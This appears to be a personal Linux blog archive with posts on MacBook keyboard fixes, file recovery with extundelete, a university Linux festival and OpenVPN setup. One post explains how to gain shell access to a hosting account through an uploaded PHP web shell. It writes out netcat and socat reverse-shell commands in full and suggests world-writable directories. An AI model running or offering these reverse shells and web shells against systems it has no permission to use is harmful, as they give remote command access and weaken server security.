Posts Tagged ‘RootShell’

Keyboard functions have major functionality on operating systems other than MacOSX. Soon when you install Ubuntu on your Macbook, you’ll notice different problems from default keyboard function keys behavior (which needs Fn key to be hold) to extremely slow touch-pad. Most of issues and their solutions are described on the Ubuntu Macbook wiki page. But recent kernels have had some modifications that parameters described over the net, do not cover how to fix the issue with newer kernels. The old way of fixing keyboard was to add an option to Human Interface Device (HID) module of kernel to switch function keys mode. For example you might add the following contents to /etc/modprobe.d/functions.conf :

options hid pb_fnmode=2

Replace hid with usbhid for kernels older than 2.6.20. But none of them worked for my Ubuntu 10.04 Lucid running a 2.6.32 kernel. In recent kernels, Apple HIDs have a separate kernel module named hid-apple and the parameter has been changed to fnmode. Knowing these changed I tried to change the parameter by providing fnmode parameter via modprobe just like before, but failed. So to fix keyboard issue I used /sys/ interface to change fnmode parameter of hid_apple module.

root@Seeb:/home/ali# echo 2 > /sys/module/hid_apple/parameters/fnmode

Put this in your startup script /etc/rc.local before exit command, so that the issue gets fixed automatically on each boot. If you don’t know how to edit the file using root priviledges, that’s easy ! Press Alt+F2 and type the following command in your Run dialog :

gksudo gedit /etc/rc.local

For you touch-pad speed issue, all you need to do is to install gsynaptics (qsynaptics for KDE guys) package, open Touchpad Preferences from System > Preferences > Touchpad, and increase the newly shown parameters “Min Speed” and “Max Speed”:

Sometimes you purchase a web host and the only thing you have to control it, is an ftp account. For those familiar with unix-like shells, it would be really cool to have an SSH session on your account, but most of web hosts don’t allow this option. It makes the life much easier for maintaining the files and permissions.

First step is to investigate whether your php service bans the functions to execute a process or not. I’m talking about the exec and system and popen function series. You may write your own test or install a php script called “PHP Shell”. PHP Shell receives the shell commands through the web browser and executes them and finally delivers the output right at the browser window. There are lots of php shells out there. I used this one developed by Martin Geisler. Download one of them and upload it using your ftp account.

For simple operations, you can get an interactive shell using GNU netcat (Note the GNU word, there are lots of other versions and most of them do not support executing commands). If you run the following command on your machine, it would create a simple tcp listener on an specific port :

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when some one connects to your listener. Then by running the following line, we can the simply connect from the phpshell to our local listener and receive a shell :

netcat my.pc.ip.address 8999 -e “/bin/bash -i”

The above netcat command will connect to your pc at home and execute an interactive bash shell. At this stage you have a command and see the resulting shell (i call it semi interactive). Soon you’ll notice that special terminal commands such as Ctrl+D, Ctrl+C and arrow keys don’t work as expected.

We’ll use socat to overcome this problem. socat can connect almost every two streams you find in the world. From files to sockets, Terminals to udp connections, process output to tcp connection and it supports SSL connections too. But it is not installed on most distributions by default. So the first step is to get the source and compile it. We need it both on our local pc and on the web server. Well, the pc part is easy, but for the web server side you should first find out that whether the build tools (compiler, make, etc) are installed on the web server or not. Test it simply by running g++ and make in your php shell. If yes, you’re all set and follow these steps to get it running :

  1. run wget
  2. extract the file using tar -xf socat-
  3. cd socat-1.7.13
  4. ./configure
  5. make

if everything went smoothly and fine, you would have the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to setup the listener, this time using socat and connect to it from the webhost, run the following command to get the listener :

socat file:`tty`,raw,echo=0 tcp-listen:8999

and run this one from the php-shell to get the terminal.

./socat tcp-connect:my.pc.ip.address:80 exec:’bash -li’,pty,stderr,setsid,sigint,sane

The first socat command, connected a tcp socket (which is yet listening) to your current TTY and second one, connects the bash process to your tcp listener. Now, you have a fully functional TTY Terminal connected to your account in the web-host. Almost all terminal commands work and you can run vim, nano, screen and Midnight commander 😎 . There are few differences between an SSH session and this reverse shell. The most  important ones are :

  1. Your session is not encrypted, you may use SSL capabilities of socat
  2. SSH automatically forwards some of useful shell variables, you may set them your self or put them in the .bash_profile or .bash_rc of the web hosting account, such as
    export TERM=”xterm-color”
  • For simplicity purposes, you may put the second socat command line in a new php script to avoid using php shell each time. Note that you should either secure your php shell or delete it when everything finished to avoid others, access your account.
  • Some web servers run using a different user id than your current account. It would cause that you don’t have permission to create and edit files using the php shell. In such situations, creating a world wide writable directory (Enable All Permissions for All) would do the job.

I just pressed the Enter key on the file delete confirmation dialog, and removed my code which I was working on for 3 hours. In fact I had made such a mistake before and had no results searching “Ext3 Recovery / Ext4 Recovery …”. But this time, a new project named extundelete appeared which claims to extract file metadata from the file-system’s Journal.

I tried to extract and compile it by just typing “make” and found that ext2fs library is missing, so I installed ext2fs-dev package using the following command (I’m using Ubuntu 9.10) :

sudo apt-get install ext2fs-dev

Then typing “make” in the src folder, presents you the binary file named “extundelete”. You can run it like this :

ali@Velocity:~/tmp/extundelete-0.1.8/src$ ./extundelete
No action specified; implying --superblock.

Usage: ./extundelete [options] [--] device-file

--version, -[vV]       Print version and exit successfully.
--help,                Print this help and exit successfully.
--superblock           Print contents of superblock in addition to the rest.
                       If no action is specified then this option is implied.
--journal              Show content of journal.
--after dtime          Only process entries deleted on or after 'dtime'.
--before dtime         Only process entries deleted before 'dtime'.

--inode ino            Show info on inode 'ino'.
--block blk            Show info on block 'blk'.

--restore-inode ino     Restore the file(s) with known inode number 'ino'.
                        The restored files are created in ./RESTORED_FILES
                        with their inode number as extension (ie, inode.12345).

--restore-file 'path'  Will restore file 'path'. 'path' is relative to root of
                      the partition and does not start with a '/'
                      (it must be one of the paths returned by --dump-names).
                      The restored file is created in the current directory
                      as 'RECOVERED_FILES/path'.

--restore-files 'path'    Will restore files which are listed in the file 'path'.
                    Each filename should be in the same format as
                    an option to --restore-file, and there should be one per line.

--restore-all          Attempts to restore everything.
-j journal             Reads an external journal from the named file.
-b blocknumber         Uses the backup superblock at blocknumber when
                                opening the file system.
-B blocksize           Uses blocksize as the block size when opening fs.
                       The number should be the number of bytes.

It seems that running the program with –restore-all, should restore all possible files. Like this :

ali@Velocity$ ./extundelete /dev/sda6 --restore-all

But that option gave me some temporary, hidden and some useless config files over my home folder. I was thinking of rewriting the code …

Suddenly I found that, extundelete supports another option in which you can specify the inode number of your file, and it will bring it back … 🙂

Looking at manual of the “ls” command you’ll find that running “ls” with -i parameter will give you the inode number of files in a directory. I tried to find a range for inode files around the deleted file and search for all files in the range …

ali@Velocity:~/projects/Monko-MovieQuiz/Source/IMDBot/src$ ls -i
7824227 artists.db
7824214 movies-merged.db
7824219 movies-vahid.db
7824254 movies-sohrab.db
7864492 tests
7864514 cache
7824208 MovieDatabase.pyc
7824207 movies-soroush.db
7962711 Tools

It seems that most of the files are in the range of 7824xxx, so searching the range of to 7824000 to 7824999 might be a good idea (take a look at the following bash code snippet) :

for((i=7824000; i<7824999; i++)); do
./extundelete /dev/sda6 --restore-inode $i ;

Viva !

I got 7 deleted files in this range (inside the RECOVERED_FILES directory), and one of them was my deleted python code ! And I spent my time on writing this article instead of rewriting the code 😉

Second Linux Festival - AUT

Second Linux Festival has been successfully held at Amirkabir University of Technology (AKA Polytechnic). It has been divided into three main levels of Beginner, Intermediate and Advanced. The topics has been presented inside Computer Site of CEIT department under a much better quality comparing to the last year’s festival. People installed, tasted and utilized a new operating system in a well mannered approach. During the installation process and most of other presentations, our local server and mirror of software packages (aka SSCLinuxBox) helped a lot and became the standard way of sharing files / installing software during the festival.

Topics and Schedule

One month ago, when we were planning for festival topics and schedule, Amir-Mohammad and I reviewed many Linux-related books and their contents. This resulted into a rich outline for the festival topics. Taking a look at topics and presentation quality this was the best and first festival in Iran covering this scope of topics. Here’s a summary of main subjects and presentations :

  • Beginner (1st Day)
    • Linux W5H2 ?
    • Distributions
    • Installing Ubuntu Linux
    • Package Management
    • Linux File System Structure
    • Desktop Environments
    • Useful Programs
  • Intermediate (2nd Day)
    • System Configuration
    • Introduction to command line
    • Linux and Network
    • Web Development in Linux
    • Installing software from source
    • GUI Development Using QT
  • Advanced (3rd Day)
    • Boot-up Process
    • Network concepts in Linux
    • Linux Servers
    • Scripting in Linux (Bash, Python, …)
    • The Linux Kernel
    • Linux Security

The complete program and schedule can be found here.

What I learned

Although it was the second experience on Linux Festival in our university and we fixed almost all of problems which could be seen in the last one, there are always problems and we can learn from them. One of the main points I got in the first few presentations, was the importance of coordination between presenters around the topics and details which is going to be presented. Lack of such synchronization and coordination before the festival, resulted into problems in presentation topics and contents since some of presenters did have a different idea about listener’s levels and prepared some extra stuff for those who where beginner. In addition none of us knew about the dependencies of subject that was going to be presented, whether they have been discussed up to now or not.

Yet another point on the art of presentation and teaching. In situations like this, where every presenter is a professional in a field and likes the topic and have chosen to teach it, hiding the unnecessary details is a very very hard task. A teacher should have the ability to place and simulate the thinking process of listeners and remove the details that might break this thinking process. On the other hand, he should analyze the required dependencies of current topic and explain them before anything.

I got many feedbacks regarding the presentation style and found that the estimation of listener’s level and correct decomposition of subject into the simplest form are keys to a successful presentation.


It was a cool and friendly atmosphere. The support team and technical team were both working hard to reach the best quality and it made it a real memory. Its notable that this was the first serious work/project of our new Scientific Committee and the results were incredible.

Second Linux Festival - AUT


Narcis For Linux - Revision 3 - Screenshot

I’ve been playing around with the full-featured English-Persian dictionary named Narcis. Narcis has been provided as a Windows application and AFAIK the development has been stopped. Just found it useful to have their rich database, so wrote some python scripts to decode the character set and export it into C++ source code format. Now I’m writing my Linux port using QT, C++ and Sqlite :). For more information on the project, refer to the N4L wiki page.

In fact the worst thing with upgrading your operating system is that there are always some features that you miss in the new one or it is broken by mistake ! I was using Ubuntu version 8.10 and when I upgraded to version 9.04, realized that intel driver that is included in this release is in beta stages and the performance was really poor. Then I downgrade to 8.10 and again with the release of 9.10 (karmic) my vpn and openvpn configuration using Network Manager did not work.

I decided to stick with Shell again, and connect using my OpenVPN configurations by a simple openvpn command.

It is as simple as running a single command, you should first switch the directory to where your config files exist and type :

sudo openvpn --config myclient.conf

Two weeks ago I had upgraded my Windows XP SP3 to Windows 7 and guess what, The openvpn-gui package wasn’t working either.

Taking a look at openvpn log, I found that it has routing problems with the following error and can’t set the routes, so the windows network applet says “No internet access” for that.

ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct.

It seems that some forwarding structure and API has been changed since Vista and openvpn version 2.0.9 is not aware of them. After googling around, I found that the latest official OpenVPN release had fixed these issues. And it is interesting that they’ve included the GUI for windows in the official release. You can download version 2.1.1 from :

and take care, you should put it into “Windows Vista” compatibility mode and run it as administrator.

After installation, you should copy your config files into C:\Program Files\OpenVPN\config\ and run OpenVPN GUI from start menu. If you got into routing problems again, try running the OpenVPN GUI as administrator too.